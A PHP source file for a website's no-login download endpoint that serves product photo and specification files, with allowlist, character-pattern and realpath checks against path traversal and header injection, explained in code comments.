File: D:/HostingSpaces/SBogers10/promic.komma.pro/wwwroot/downloadWithoutLogin.php
<?php


include("functions.php");

/**
 * Reports whether $haystack begins with $needle.
 *
 * The comparison is byte-wise and case-sensitive. An empty $needle always
 * matches.
 *
 * @param string $haystack String to inspect.
 * @param string $needle   Prefix to look for.
 * @return bool True when the first strlen($needle) bytes of $haystack equal $needle.
 */
function startsWith($haystack, $needle)
{
    // Comparing only the first strlen($needle) bytes is the same test as
    // slicing that many bytes off the front and checking them for identity.
    $prefixBytes = strlen($needle);
    if (strncmp($haystack, $needle, $prefixBytes) !== 0) {
        return false;
    }
    return true;
}

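// Public (no-login) download endpoint: streams one product file as an attachment.
//
// Every path component comes from the query string, so each one is validated
// before it is used:
//   - product: exact match against a fixed list
//   - file:    exact match against a fixed list, or a known "*_specs_" prefix
//              followed by a restricted set of characters
//   - ext:     "zip" or "pdf" only
// The resolved path must also lie inside the product's download directory.
if (isset($_GET["file"]) && isset($_GET["ext"])) {
    // PHP turns ?file[]=x into an array; treat anything that is not a string
    // as an empty (and therefore rejected) value.
    $bestandsnaam = is_string($_GET["file"]) ? $_GET["file"] : '';
    $ext = is_string($_GET["ext"]) ? $_GET["ext"] : '';
    $product = (isset($_GET["product"]) && is_string($_GET["product"])) ? $_GET["product"] : '';

    $allowedProducts = ['flex-tower', 'counters-flex', 'flags-alu-wind', 'flags-alu-drop', 'flags-alu-square'];
    // Strict comparison: no type juggling between the request value and the list.
    if (!in_array($product, $allowedProducts, true)) {
        echo 'Products error';
        exit;
    }

    $fixedNames = [
        'flex-tower_photos_high',
        'flex-tower_photos',
        'counters-flex_photos_high',
        'counters-flex_photos',
        'flags-alu-wind_photos_high',
        'flags-alu-square_photos_high',
        'flags-alu-drop_photos_high',
    ];
    $specPrefixes = ['flags-alu-wind_specs_', 'flags-alu-square_specs_', 'flags-alu-drop_specs_'];

    $nameAllowed = in_array($bestandsnaam, $fixedNames, true);
    foreach ($specPrefixes as $prefix) {
        if (startsWith($bestandsnaam, $prefix)) {
            $nameAllowed = true;
            break;
        }
    }

    // A prefix match alone says nothing about the rest of the name, which would
    // otherwise be free to contain directory separators or ".." segments and
    // leave the download directory. Only letters, digits, "_" and "-" are
    // accepted, optionally joined by single dots.
    // NOTE(review): widen this set if real spec files use other characters.
    $nameIsPlain = preg_match('/\A[A-Za-z0-9_-]+(?:\.[A-Za-z0-9_-]+)*\z/', $bestandsnaam) === 1;

    if (!$nameAllowed || !$nameIsPlain) {
        echo 'File name error';
        exit;
    }

    // Only zip or pdf may be served; the extension also selects the Content-Type.
    $contentTypes = [
        'pdf' => 'application/pdf',
        'zip' => 'application/octet-stream',
    ];

    if (isset($contentTypes[$ext])) {
        $downloadDir = "product_data/downloads/".$product;
        $filename = $downloadDir."/".$bestandsnaam.".".$ext;

        // Defence in depth: resolve both paths and require the file to sit
        // inside the product directory, so links or junctions cannot redirect
        // the read elsewhere. realpath() returns false for missing paths.
        $realDir = realpath($downloadDir);
        $realFile = realpath($filename);
        $servable = $realDir !== false
            && $realFile !== false
            && is_file($realFile)
            && strncmp($realFile, $realDir.DIRECTORY_SEPARATOR, strlen($realDir) + 1) === 0;

        if (!$servable) {
            // $taal_input is not set in this block; presumably functions.php
            // provides it. Fall back to English when it is absent.
            if (isset($taal_input) && $taal_input == "nl") { echo("Dit bestand bestaat niet."); } else { echo("This file doesn't exists."); }

            exit;
        }

        // Compressed output would make the Content-Length below wrong.
        if (ini_get('zlib.output_compression')) {
            ini_set('zlib.output_compression', 'Off');
        }

        header("Pragma: public"); // required
        header("Expires: 0");
        header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
        header("Cache-Control: private", false); // required for certain browsers

        // The previous MSIE 7/8 checks called ereg(), which was removed in
        // PHP 7.0 and is a fatal error on current runtimes. The two separate
        // checks also meant the Content-Type header was sent for every user
        // agent anyway, so it is now sent unconditionally.
        header('Content-Type: '.$contentTypes[$ext]);
        // Stop browsers from guessing a different type for the payload.
        header('X-Content-Type-Options: nosniff');
        // basename() of a name limited to the characters above cannot carry
        // quotes or line breaks into the header.
        header("Content-Disposition: attachment; filename=\"".basename($filename)."\"");
        header("Content-Transfer-Encoding: binary");
        header("Content-Length: ".filesize($realFile));
        readfile($realFile);

        exit();
    }
}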

?>